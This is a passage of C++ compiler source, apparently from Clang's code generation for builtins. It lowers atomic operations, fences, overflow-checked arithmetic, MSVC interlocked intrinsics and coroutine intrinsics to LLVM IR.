Value *Ptr = EmitScalarExpr(E->getArg(0));
QualType ElTy = E->getArg(0)->getType()->getPointeeType();
CharUnits StoreSize = getContext().getTypeSizeInChars(ElTy);
llvm::Type *ITy = llvm::IntegerType::get(getLLVMContext(),
StoreSize.getQuantity() * 8);
Ptr = Builder.CreateBitCast(Ptr, ITy->getPointerTo());
llvm::StoreInst *Store =
Builder.CreateAlignedStore(llvm::Constant::getNullValue(ITy), Ptr,
StoreSize);
Store->setAtomic(llvm::AtomicOrdering::Release);
return RValue::get(nullptr);
}
case Builtin::BI__sync_synchronize: {
// We assume this is supposed to correspond to a C++0x-style
// sequentially-consistent fence (i.e. this is only usable for
// synchronization, not device I/O or anything like that). This intrinsic
// is really badly designed in the sense that in theory, there isn't
// any way to safely use it... but in practice, it mostly works
// to use it with non-atomic loads and stores to get acquire/release
// semantics.
Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent);
return RValue::get(nullptr);
}
case Builtin::BI__builtin_nontemporal_load:
return RValue::get(EmitNontemporalLoad(*this, E));
case Builtin::BI__builtin_nontemporal_store:
return RValue::get(EmitNontemporalStore(*this, E));
case Builtin::BI__c11_atomic_is_lock_free:
case Builtin::BI__atomic_is_lock_free: {
// Call "bool __atomic_is_lock_free(size_t size, void *ptr)". For the
// __c11 builtin, ptr is 0 (indicating a properly-aligned object), since
// _Atomic(T) is always properly-aligned.
const char *LibCallName = "__atomic_is_lock_free";
CallArgList Args;
Args.add(RValue::get(EmitScalarExpr(E->getArg(0))),
getContext().getSizeType());
if (BuiltinID == Builtin::BI__atomic_is_lock_free)
Args.add(RValue::get(EmitScalarExpr(E->getArg(1))),
getContext().VoidPtrTy);
else
Args.add(RValue::get(llvm::Constant::getNullValue(VoidPtrTy)),
getContext().VoidPtrTy);
const CGFunctionInfo &FuncInfo =
CGM.getTypes().arrangeBuiltinFunctionCall(E->getType(), Args);
llvm::FunctionType *FTy = CGM.getTypes().GetFunctionType(FuncInfo);
llvm::FunctionCallee Func = CGM.CreateRuntimeFunction(FTy, LibCallName);
return EmitCall(FuncInfo, CGCallee::forDirect(Func),
ReturnValueSlot(), Args);
}
case Builtin::BI__atomic_test_and_set: {
// Look at the argument type to determine whether this is a volatile
// operation. The parameter type is always volatile.
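// The operation itself is an 'atomicrmw xchg' of the byte value 1 at the
// requested ordering; comparing the old value against zero produces the
// boolean result.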
QualType PtrTy = E->getArg(0)->IgnoreImpCasts()->getType();
bool Volatile =
PtrTy->castAs<PointerType>()->getPointeeType().isVolatileQualified();
Value *Ptr = EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = Ptr->getType()->getPointerAddressSpace();
Ptr = Builder.CreateBitCast(Ptr, Int8Ty->getPointerTo(AddrSpace));
Value *NewVal = Builder.getInt8(1);
Value *Order = EmitScalarExpr(E->getArg(1));
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
AtomicRMWInst *Result = nullptr;
switch (ord) {
case 0: // memory_order_relaxed
default: // invalid order
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::Monotonic);
break;
case 1: // memory_order_consume
case 2: // memory_order_acquire
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::Acquire);
break;
case 3: // memory_order_release
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::Release);
break;
case 4: // memory_order_acq_rel
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::AcquireRelease);
break;
case 5: // memory_order_seq_cst
Result = Builder.CreateAtomicRMW(
llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::SequentiallyConsistent);
break;
}
Result->setVolatile(Volatile);
return RValue::get(Builder.CreateIsNotNull(Result, "tobool"));
}
llvm::BasicBlock *ContBB = createBasicBlock("atomic.continue", CurFn);
llvm::BasicBlock *BBs[5] = {
createBasicBlock("monotonic", CurFn),
createBasicBlock("acquire", CurFn),
createBasicBlock("release", CurFn),
createBasicBlock("acqrel", CurFn),
createBasicBlock("seqcst", CurFn)
};
llvm::AtomicOrdering Orders[5] = {
llvm::AtomicOrdering::Monotonic, llvm::AtomicOrdering::Acquire,
llvm::AtomicOrdering::Release, llvm::AtomicOrdering::AcquireRelease,
llvm::AtomicOrdering::SequentiallyConsistent};
Order = Builder.CreateIntCast(Order, Builder.getInt32Ty(), false);
llvm::SwitchInst *SI = Builder.CreateSwitch(Order, BBs[0]);
Builder.SetInsertPoint(ContBB);
PHINode *Result = Builder.CreatePHI(Int8Ty, 5, "was_set");
for (unsigned i = 0; i < 5; ++i) {
Builder.SetInsertPoint(BBs[i]);
AtomicRMWInst *RMW = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg,
Ptr, NewVal, Orders[i]);
RMW->setVolatile(Volatile);
Result->addIncoming(RMW, BBs[i]);
Builder.CreateBr(ContBB);
}
SI->addCase(Builder.getInt32(0), BBs[0]);
SI->addCase(Builder.getInt32(1), BBs[1]);
SI->addCase(Builder.getInt32(2), BBs[1]);
SI->addCase(Builder.getInt32(3), BBs[2]);
SI->addCase(Builder.getInt32(4), BBs[3]);
SI->addCase(Builder.getInt32(5), BBs[4]);
Builder.SetInsertPoint(ContBB);
return RValue::get(Builder.CreateIsNotNull(Result, "tobool"));
}
case Builtin::BI__atomic_clear: {
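// __atomic_clear is an atomic store of zero; only the relaxed, release,
// and seq_cst orderings are valid here.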
QualType PtrTy = E->getArg(0)->IgnoreImpCasts()->getType();
bool Volatile =
PtrTy->castAs<PointerType>()->getPointeeType().isVolatileQualified();
Address Ptr = EmitPointerWithAlignment(E->getArg(0));
unsigned AddrSpace = Ptr.getPointer()->getType()->getPointerAddressSpace();
Ptr = Builder.CreateBitCast(Ptr, Int8Ty->getPointerTo(AddrSpace));
Value *NewVal = Builder.getInt8(0);
Value *Order = EmitScalarExpr(E->getArg(1));
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
StoreInst *Store = Builder.CreateStore(NewVal, Ptr, Volatile);
switch (ord) {
case 0: // memory_order_relaxed
default: // invalid order
Store->setOrdering(llvm::AtomicOrdering::Monotonic);
break;
case 3: // memory_order_release
Store->setOrdering(llvm::AtomicOrdering::Release);
break;
case 5: // memory_order_seq_cst
Store->setOrdering(llvm::AtomicOrdering::SequentiallyConsistent);
break;
}
return RValue::get(nullptr);
}
llvm::BasicBlock *ContBB = createBasicBlock("atomic.continue", CurFn);
llvm::BasicBlock *BBs[3] = {
createBasicBlock("monotonic", CurFn),
createBasicBlock("release", CurFn),
createBasicBlock("seqcst", CurFn)
};
llvm::AtomicOrdering Orders[3] = {
llvm::AtomicOrdering::Monotonic, llvm::AtomicOrdering::Release,
llvm::AtomicOrdering::SequentiallyConsistent};
Order = Builder.CreateIntCast(Order, Builder.getInt32Ty(), false);
llvm::SwitchInst *SI = Builder.CreateSwitch(Order, BBs[0]);
for (unsigned i = 0; i < 3; ++i) {
Builder.SetInsertPoint(BBs[i]);
StoreInst *Store = Builder.CreateStore(NewVal, Ptr, Volatile);
Store->setOrdering(Orders[i]);
Builder.CreateBr(ContBB);
}
SI->addCase(Builder.getInt32(0), BBs[0]);
SI->addCase(Builder.getInt32(3), BBs[1]);
SI->addCase(Builder.getInt32(5), BBs[2]);
Builder.SetInsertPoint(ContBB);
return RValue::get(nullptr);
}
case Builtin::BI__atomic_thread_fence:
case Builtin::BI__atomic_signal_fence:
case Builtin::BI__c11_atomic_thread_fence:
case Builtin::BI__c11_atomic_signal_fence: {
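// Signal fences only order operations within the current thread
// (SingleThread scope); thread fences use the System scope.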
llvm::SyncScope::ID SSID;
if (BuiltinID == Builtin::BI__atomic_signal_fence ||
BuiltinID == Builtin::BI__c11_atomic_signal_fence)
SSID = llvm::SyncScope::SingleThread;
else
SSID = llvm::SyncScope::System;
Value *Order = EmitScalarExpr(E->getArg(0));
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
switch (ord) {
case 0: // memory_order_relaxed
default: // invalid order
break;
case 1: // memory_order_consume
case 2: // memory_order_acquire
Builder.CreateFence(llvm::AtomicOrdering::Acquire, SSID);
break;
case 3: // memory_order_release
Builder.CreateFence(llvm::AtomicOrdering::Release, SSID);
break;
case 4: // memory_order_acq_rel
Builder.CreateFence(llvm::AtomicOrdering::AcquireRelease, SSID);
break;
case 5: // memory_order_seq_cst
Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent, SSID);
break;
}
return RValue::get(nullptr);
}
llvm::BasicBlock *AcquireBB, *ReleaseBB, *AcqRelBB, *SeqCstBB;
AcquireBB = createBasicBlock("acquire", CurFn);
ReleaseBB = createBasicBlock("release", CurFn);
AcqRelBB = createBasicBlock("acqrel", CurFn);
SeqCstBB = createBasicBlock("seqcst", CurFn);
llvm::BasicBlock *ContBB = createBasicBlock("atomic.continue", CurFn);
Order = Builder.CreateIntCast(Order, Builder.getInt32Ty(), false);
llvm::SwitchInst *SI = Builder.CreateSwitch(Order, ContBB);
Builder.SetInsertPoint(AcquireBB);
Builder.CreateFence(llvm::AtomicOrdering::Acquire, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(1), AcquireBB);
SI->addCase(Builder.getInt32(2), AcquireBB);
Builder.SetInsertPoint(ReleaseBB);
Builder.CreateFence(llvm::AtomicOrdering::Release, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(3), ReleaseBB);
Builder.SetInsertPoint(AcqRelBB);
Builder.CreateFence(llvm::AtomicOrdering::AcquireRelease, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(4), AcqRelBB);
Builder.SetInsertPoint(SeqCstBB);
Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(5), SeqCstBB);
Builder.SetInsertPoint(ContBB);
return RValue::get(nullptr);
}
case Builtin::BI__builtin_signbit:
case Builtin::BI__builtin_signbitf:
case Builtin::BI__builtin_signbitl: {
return RValue::get(
Builder.CreateZExt(EmitSignBit(*this, EmitScalarExpr(E->getArg(0))),
ConvertType(E->getType())));
}
case Builtin::BI__warn_memset_zero_len:
return RValue::getIgnored();
case Builtin::BI__annotation: {
// Re-encode each wide string to UTF8 and make an MDString.
SmallVector<Metadata *, 1> Strings;
for (const Expr *Arg : E->arguments()) {
const auto *Str = cast<StringLiteral>(Arg->IgnoreParenCasts());
assert(Str->getCharByteWidth() == 2);
StringRef WideBytes = Str->getBytes();
std::string StrUtf8;
if (!convertUTF16ToUTF8String(
makeArrayRef(WideBytes.data(), WideBytes.size()), StrUtf8)) {
CGM.ErrorUnsupported(E, "non-UTF16 __annotation argument");
continue;
}
Strings.push_back(llvm::MDString::get(getLLVMContext(), StrUtf8));
}
// Build an MDTuple of MDStrings and emit the intrinsic call.
llvm::Function *F =
CGM.getIntrinsic(llvm::Intrinsic::codeview_annotation, {});
MDTuple *StrTuple = MDTuple::get(getLLVMContext(), Strings);
Builder.CreateCall(F, MetadataAsValue::get(getLLVMContext(), StrTuple));
return RValue::getIgnored();
}
case Builtin::BI__builtin_annotation: {
llvm::Value *AnnVal = EmitScalarExpr(E->getArg(0));
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::annotation,
AnnVal->getType());
// Get the annotation string, looking through casts. Sema requires this to
// be a non-wide string literal, potentially with implicit casts, so the
// cast<> is safe.
const Expr *AnnotationStrExpr = E->getArg(1)->IgnoreParenCasts();
StringRef Str = cast<StringLiteral>(AnnotationStrExpr)->getString();
return RValue::get(
EmitAnnotationCall(F, AnnVal, Str, E->getExprLoc(), nullptr));
}
case Builtin::BI__builtin_addcb:
case Builtin::BI__builtin_addcs:
case Builtin::BI__builtin_addc:
case Builtin::BI__builtin_addcl:
case Builtin::BI__builtin_addcll:
case Builtin::BI__builtin_subcb:
case Builtin::BI__builtin_subcs:
case Builtin::BI__builtin_subc:
case Builtin::BI__builtin_subcl:
case Builtin::BI__builtin_subcll: {
// We translate all of these builtins from expressions of the form:
// int x = ..., y = ..., carryin = ..., carryout, result;
// result = __builtin_addc(x, y, carryin, &carryout);
//
// to LLVM IR of the form:
//
// %tmp1 = call {i32, i1} @llvm.uadd.with.overflow.i32(i32 %x, i32 %y)
// %tmpsum1 = extractvalue {i32, i1} %tmp1, 0
// %carry1 = extractvalue {i32, i1} %tmp1, 1
// %tmp2 = call {i32, i1} @llvm.uadd.with.overflow.i32(i32 %tmpsum1,
// i32 %carryin)
// %result = extractvalue {i32, i1} %tmp2, 0
// %carry2 = extractvalue {i32, i1} %tmp2, 1
// %tmp3 = or i1 %carry1, %carry2
// %tmp4 = zext i1 %tmp3 to i32
// store i32 %tmp4, i32* %carryout
// Scalarize our inputs.
llvm::Value *X = EmitScalarExpr(E->getArg(0));
llvm::Value *Y = EmitScalarExpr(E->getArg(1));
llvm::Value *Carryin = EmitScalarExpr(E->getArg(2));
Address CarryOutPtr = EmitPointerWithAlignment(E->getArg(3));
// Decide if we are lowering to a uadd.with.overflow or usub.with.overflow.
llvm::Intrinsic::ID IntrinsicId;
switch (BuiltinID) {
default: llvm_unreachable("Unknown multiprecision builtin id.");
case Builtin::BI__builtin_addcb:
case Builtin::BI__builtin_addcs:
case Builtin::BI__builtin_addc:
case Builtin::BI__builtin_addcl:
case Builtin::BI__builtin_addcll:
IntrinsicId = llvm::Intrinsic::uadd_with_overflow;
break;
case Builtin::BI__builtin_subcb:
case Builtin::BI__builtin_subcs:
case Builtin::BI__builtin_subc:
case Builtin::BI__builtin_subcl:
case Builtin::BI__builtin_subcll:
IntrinsicId = llvm::Intrinsic::usub_with_overflow;
break;
}
// Construct our resulting LLVM IR expression.
llvm::Value *Carry1;
llvm::Value *Sum1 = EmitOverflowIntrinsic(*this, IntrinsicId,
X, Y, Carry1);
llvm::Value *Carry2;
llvm::Value *Sum2 = EmitOverflowIntrinsic(*this, IntrinsicId,
Sum1, Carryin, Carry2);
llvm::Value *CarryOut = Builder.CreateZExt(Builder.CreateOr(Carry1, Carry2),
X->getType());
Builder.CreateStore(CarryOut, CarryOutPtr);
return RValue::get(Sum2);
}
case Builtin::BI__builtin_add_overflow:
case Builtin::BI__builtin_sub_overflow:
case Builtin::BI__builtin_mul_overflow: {
const clang::Expr *LeftArg = E->getArg(0);
const clang::Expr *RightArg = E->getArg(1);
const clang::Expr *ResultArg = E->getArg(2);
clang::QualType ResultQTy =
ResultArg->getType()->castAs<PointerType>()->getPointeeType();
WidthAndSignedness LeftInfo =
getIntegerWidthAndSignedness(CGM.getContext(), LeftArg->getType());
WidthAndSignedness RightInfo =
getIntegerWidthAndSignedness(CGM.getContext(), RightArg->getType());
WidthAndSignedness ResultInfo =
getIntegerWidthAndSignedness(CGM.getContext(), ResultQTy);
// Handle mixed-sign multiplication as a special case, because adding
// runtime or backend support for our generic irgen would be too expensive.
if (isSpecialMixedSignMultiply(BuiltinID, LeftInfo, RightInfo, ResultInfo))
return EmitCheckedMixedSignMultiply(*this, LeftArg, LeftInfo, RightArg,
RightInfo, ResultArg, ResultQTy,
ResultInfo);
if (isSpecialUnsignedMultiplySignedResult(BuiltinID, LeftInfo, RightInfo,
ResultInfo))
return EmitCheckedUnsignedMultiplySignedResult(
*this, LeftArg, LeftInfo, RightArg, RightInfo, ResultArg, ResultQTy,
ResultInfo);
WidthAndSignedness EncompassingInfo =
EncompassingIntegerType({LeftInfo, RightInfo, ResultInfo});
llvm::Type *EncompassingLLVMTy =
llvm::IntegerType::get(CGM.getLLVMContext(), EncompassingInfo.Width);
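// E.g. for __builtin_add_overflow(int, unsigned, long long *) on a
// 64-bit target the encompassing type is a signed 64-bit integer: wide
// enough to represent both operands and the result exactly, so the
// extended operation plus the truncation check below behaves as if the
// arithmetic were performed at infinite precision.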
llvm::Type *ResultLLVMTy = CGM.getTypes().ConvertType(ResultQTy);
llvm::Intrinsic::ID IntrinsicId;
switch (BuiltinID) {
default:
llvm_unreachable("Unknown overflow builtin id.");
case Builtin::BI__builtin_add_overflow:
IntrinsicId = EncompassingInfo.Signed
? llvm::Intrinsic::sadd_with_overflow
: llvm::Intrinsic::uadd_with_overflow;
break;
case Builtin::BI__builtin_sub_overflow:
IntrinsicId = EncompassingInfo.Signed
? llvm::Intrinsic::ssub_with_overflow
: llvm::Intrinsic::usub_with_overflow;
break;
case Builtin::BI__builtin_mul_overflow:
IntrinsicId = EncompassingInfo.Signed
? llvm::Intrinsic::smul_with_overflow
: llvm::Intrinsic::umul_with_overflow;
break;
}
llvm::Value *Left = EmitScalarExpr(LeftArg);
llvm::Value *Right = EmitScalarExpr(RightArg);
Address ResultPtr = EmitPointerWithAlignment(ResultArg);
// Extend each operand to the encompassing type.
Left = Builder.CreateIntCast(Left, EncompassingLLVMTy, LeftInfo.Signed);
Right = Builder.CreateIntCast(Right, EncompassingLLVMTy, RightInfo.Signed);
// Perform the operation on the extended values.
llvm::Value *Overflow, *Result;
Result = EmitOverflowIntrinsic(*this, IntrinsicId, Left, Right, Overflow);
if (EncompassingInfo.Width > ResultInfo.Width) {
// The encompassing type is wider than the result type, so we need to
// truncate it.
llvm::Value *ResultTrunc = Builder.CreateTrunc(Result, ResultLLVMTy);
// To see if the truncation caused an overflow, we will extend
// the result and then compare it to the original result.
llvm::Value *ResultTruncExt = Builder.CreateIntCast(
ResultTrunc, EncompassingLLVMTy, ResultInfo.Signed);
llvm::Value *TruncationOverflow =
Builder.CreateICmpNE(Result, ResultTruncExt);
Overflow = Builder.CreateOr(Overflow, TruncationOverflow);
Result = ResultTrunc;
}
// Finally, store the result using the pointer.
bool isVolatile =
ResultArg->getType()->getPointeeType().isVolatileQualified();
Builder.CreateStore(EmitToMemory(Result, ResultQTy), ResultPtr, isVolatile);
return RValue::get(Overflow);
}
case Builtin::BI__builtin_uadd_overflow:
case Builtin::BI__builtin_uaddl_overflow:
case Builtin::BI__builtin_uaddll_overflow:
case Builtin::BI__builtin_usub_overflow:
case Builtin::BI__builtin_usubl_overflow:
case Builtin::BI__builtin_usubll_overflow:
case Builtin::BI__builtin_umul_overflow:
case Builtin::BI__builtin_umull_overflow:
case Builtin::BI__builtin_umulll_overflow:
case Builtin::BI__builtin_sadd_overflow:
case Builtin::BI__builtin_saddl_overflow:
case Builtin::BI__builtin_saddll_overflow:
case Builtin::BI__builtin_ssub_overflow:
case Builtin::BI__builtin_ssubl_overflow:
case Builtin::BI__builtin_ssubll_overflow:
case Builtin::BI__builtin_smul_overflow:
case Builtin::BI__builtin_smull_overflow:
case Builtin::BI__builtin_smulll_overflow: {
// We translate all of these builtins directly to the relevant LLVM IR node.
// Scalarize our inputs.
llvm::Value *X = EmitScalarExpr(E->getArg(0));
llvm::Value *Y = EmitScalarExpr(E->getArg(1));
Address SumOutPtr = EmitPointerWithAlignment(E->getArg(2));
// Decide which of the overflow intrinsics we are lowering to:
llvm::Intrinsic::ID IntrinsicId;
switch (BuiltinID) {
default: llvm_unreachable("Unknown overflow builtin id.");
case Builtin::BI__builtin_uadd_overflow:
case Builtin::BI__builtin_uaddl_overflow:
case Builtin::BI__builtin_uaddll_overflow:
IntrinsicId = llvm::Intrinsic::uadd_with_overflow;
break;
case Builtin::BI__builtin_usub_overflow:
case Builtin::BI__builtin_usubl_overflow:
case Builtin::BI__builtin_usubll_overflow:
IntrinsicId = llvm::Intrinsic::usub_with_overflow;
break;
case Builtin::BI__builtin_umul_overflow:
case Builtin::BI__builtin_umull_overflow:
case Builtin::BI__builtin_umulll_overflow:
IntrinsicId = llvm::Intrinsic::umul_with_overflow;
break;
case Builtin::BI__builtin_sadd_overflow:
case Builtin::BI__builtin_saddl_overflow:
case Builtin::BI__builtin_saddll_overflow:
IntrinsicId = llvm::Intrinsic::sadd_with_overflow;
break;
case Builtin::BI__builtin_ssub_overflow:
case Builtin::BI__builtin_ssubl_overflow:
case Builtin::BI__builtin_ssubll_overflow:
IntrinsicId = llvm::Intrinsic::ssub_with_overflow;
break;
case Builtin::BI__builtin_smul_overflow:
case Builtin::BI__builtin_smull_overflow:
case Builtin::BI__builtin_smulll_overflow:
IntrinsicId = llvm::Intrinsic::smul_with_overflow;
break;
}
llvm::Value *Carry;
llvm::Value *Sum = EmitOverflowIntrinsic(*this, IntrinsicId, X, Y, Carry);
Builder.CreateStore(Sum, SumOutPtr);
return RValue::get(Carry);
}
case Builtin::BI__builtin_addressof:
return RValue::get(EmitLValue(E->getArg(0)).getPointer(*this));
case Builtin::BI__builtin_operator_new:
return EmitBuiltinNewDeleteCall(
E->getCallee()->getType()->castAs<FunctionProtoType>(), E, false);
case Builtin::BI__builtin_operator_delete:
return EmitBuiltinNewDeleteCall(
E->getCallee()->getType()->castAs<FunctionProtoType>(), E, true);
case Builtin::BI__builtin_is_aligned:
return EmitBuiltinIsAligned(E);
case Builtin::BI__builtin_align_up:
return EmitBuiltinAlignTo(E, true);
case Builtin::BI__builtin_align_down:
return EmitBuiltinAlignTo(E, false);
case Builtin::BI__noop:
// __noop always evaluates to an integer literal zero.
return RValue::get(ConstantInt::get(IntTy, 0));
case Builtin::BI__builtin_call_with_static_chain: {
const CallExpr *Call = cast<CallExpr>(E->getArg(0));
const Expr *Chain = E->getArg(1);
return EmitCall(Call->getCallee()->getType(),
EmitCallee(Call->getCallee()), Call, ReturnValue,
EmitScalarExpr(Chain));
}
case Builtin::BI_InterlockedExchange8:
case Builtin::BI_InterlockedExchange16:
case Builtin::BI_InterlockedExchange:
case Builtin::BI_InterlockedExchangePointer:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedExchange, E));
case Builtin::BI_InterlockedCompareExchangePointer:
case Builtin::BI_InterlockedCompareExchangePointer_nf: {
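// Lower the pointer compare-exchange by round-tripping through an
// integer of pointer width, since cmpxchg operates on integers. The
// "_nf" (no fence) variant relaxes the ordering to monotonic.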
llvm::Type *RTy;
llvm::IntegerType *IntType =
IntegerType::get(getLLVMContext(),
getContext().getTypeSize(E->getType()));
llvm::Type *IntPtrType = IntType->getPointerTo();
llvm::Value *Destination =
Builder.CreateBitCast(EmitScalarExpr(E->getArg(0)), IntPtrType);
llvm::Value *Exchange = EmitScalarExpr(E->getArg(1));
RTy = Exchange->getType();
Exchange = Builder.CreatePtrToInt(Exchange, IntType);
llvm::Value *Comparand =
Builder.CreatePtrToInt(EmitScalarExpr(E->getArg(2)), IntType);
auto Ordering =
BuiltinID == Builtin::BI_InterlockedCompareExchangePointer_nf ?
AtomicOrdering::Monotonic : AtomicOrdering::SequentiallyConsistent;
auto Result = Builder.CreateAtomicCmpXchg(Destination, Comparand, Exchange,
Ordering, Ordering);
Result->setVolatile(true);
return RValue::get(Builder.CreateIntToPtr(
Builder.CreateExtractValue(Result, 0), RTy));
}
case Builtin::BI_InterlockedCompareExchange8:
case Builtin::BI_InterlockedCompareExchange16:
case Builtin::BI_InterlockedCompareExchange:
case Builtin::BI_InterlockedCompareExchange64:
return RValue::get(EmitAtomicCmpXchgForMSIntrin(*this, E));
case Builtin::BI_InterlockedIncrement16:
case Builtin::BI_InterlockedIncrement:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedIncrement, E));
case Builtin::BI_InterlockedDecrement16:
case Builtin::BI_InterlockedDecrement:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedDecrement, E));
case Builtin::BI_InterlockedAnd8:
case Builtin::BI_InterlockedAnd16:
case Builtin::BI_InterlockedAnd:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedAnd, E));
case Builtin::BI_InterlockedExchangeAdd8:
case Builtin::BI_InterlockedExchangeAdd16:
case Builtin::BI_InterlockedExchangeAdd:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedExchangeAdd, E));
case Builtin::BI_InterlockedExchangeSub8:
case Builtin::BI_InterlockedExchangeSub16:
case Builtin::BI_InterlockedExchangeSub:
return RValue::get(
EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedExchangeSub, E));
case Builtin::BI_InterlockedOr8:
case Builtin::BI_InterlockedOr16:
case Builtin::BI_InterlockedOr:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedOr, E));
case Builtin::BI_InterlockedXor8:
case Builtin::BI_InterlockedXor16:
case Builtin::BI_InterlockedXor:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::_InterlockedXor, E));
case Builtin::BI_bittest64:
case Builtin::BI_bittest:
case Builtin::BI_bittestandcomplement64:
case Builtin::BI_bittestandcomplement:
case Builtin::BI_bittestandreset64:
case Builtin::BI_bittestandreset:
case Builtin::BI_bittestandset64:
case Builtin::BI_bittestandset:
case Builtin::BI_interlockedbittestandreset:
case Builtin::BI_interlockedbittestandreset64:
case Builtin::BI_interlockedbittestandset64:
case Builtin::BI_interlockedbittestandset:
case Builtin::BI_interlockedbittestandset_acq:
case Builtin::BI_interlockedbittestandset_rel:
case Builtin::BI_interlockedbittestandset_nf:
case Builtin::BI_interlockedbittestandreset_acq:
case Builtin::BI_interlockedbittestandreset_rel:
case Builtin::BI_interlockedbittestandreset_nf:
return RValue::get(EmitBitTestIntrinsic(*this, BuiltinID, E));
// These builtins exist to emit regular volatile loads and stores not
// affected by the -fms-volatile setting.
case Builtin::BI__iso_volatile_load8:
case Builtin::BI__iso_volatile_load16:
case Builtin::BI__iso_volatile_load32:
case Builtin::BI__iso_volatile_load64:
return RValue::get(EmitISOVolatileLoad(*this, E));
case Builtin::BI__iso_volatile_store8:
case Builtin::BI__iso_volatile_store16:
case Builtin::BI__iso_volatile_store32:
case Builtin::BI__iso_volatile_store64:
return RValue::get(EmitISOVolatileStore(*this, E));
case Builtin::BI__exception_code:
case Builtin::BI_exception_code:
return RValue::get(EmitSEHExceptionCode());
case Builtin::BI__exception_info:
case Builtin::BI_exception_info:
return RValue::get(EmitSEHExceptionInfo());
case Builtin::BI__abnormal_termination:
case Builtin::BI_abnormal_termination:
return RValue::get(EmitSEHAbnormalTermination());
case Builtin::BI_setjmpex:
if (getTarget().getTriple().isOSMSVCRT() && E->getNumArgs() == 1 &&
E->getArg(0)->getType()->isPointerType())
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmpex, E);
break;
case Builtin::BI_setjmp:
if (getTarget().getTriple().isOSMSVCRT() && E->getNumArgs() == 1 &&
E->getArg(0)->getType()->isPointerType()) {
if (getTarget().getTriple().getArch() == llvm::Triple::x86)
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmp3, E);
else if (getTarget().getTriple().getArch() == llvm::Triple::aarch64)
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmpex, E);
return EmitMSVCRTSetJmp(*this, MSVCSetJmpKind::_setjmp, E);
}
break;
case Builtin::BI__GetExceptionInfo: {
if (llvm::GlobalVariable *GV =
CGM.getCXXABI().getThrowInfo(FD->getParamDecl(0)->getType()))
return RValue::get(llvm::ConstantExpr::getBitCast(GV, CGM.Int8PtrTy));
break;
}
case Builtin::BI__fastfail:
return RValue::get(EmitMSVCBuiltinExpr(MSVCIntrin::__fastfail, E));
case Builtin::BI__builtin_coro_size: {
auto &Context = getContext();
auto SizeTy = Context.getSizeType();
auto T = Builder.getIntNTy(Context.getTypeSize(SizeTy));
Function *F = CGM.getIntrinsic(Intrinsic::coro_size, T);
return RValue::get(Builder.CreateCall(F));
}
case Builtin::BI__builtin_coro_id:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_id);
case Builtin::BI__builtin_coro_promise:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_promise);
case Builtin::BI__builtin_coro_resume:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_resume);
case Builtin::BI__builtin_coro_frame:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_frame);
case Builtin::BI__builtin_coro_noop:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_noop);
case Builtin::BI__builtin_coro_free:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_free);
case Builtin::BI__builtin_coro_destroy:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_destroy);
case Builtin::BI__builtin_coro_done:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_done);
case Builtin::BI__builtin_coro_alloc:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_alloc);
case Builtin::BI__builtin_coro_begin:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_begin);
case Builtin::BI__builtin_coro_end:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_end);
case Builtin::BI__builtin_coro_suspend:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_suspend);
case Builtin::BI__builtin_coro_param:
return EmitCoroutineIntrinsic(E, Intrinsic::coro_param);
// OpenCL v2.0 s6.13.16.2, Built-in pipe read and write functions
case Builtin::BIread_pipe:
case Builtin::BIwrite_pipe: {
Value *Arg0 = EmitScalarExpr(E->getArg(0)),
*Arg1 = EmitScalarExpr(E->getArg(1));
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
// Type of the generic packet parameter.
unsigned GenericAS =
getContext().getTargetAddressSpace(LangAS::opencl_generic);
llvm::Type *I8PTy = llvm::PointerType::get(
llvm::Type::getInt8Ty(getLLVMContext()), GenericAS);
// Testing which overloaded version we should generate the call for.
if (2U == E->getNumArgs()) {
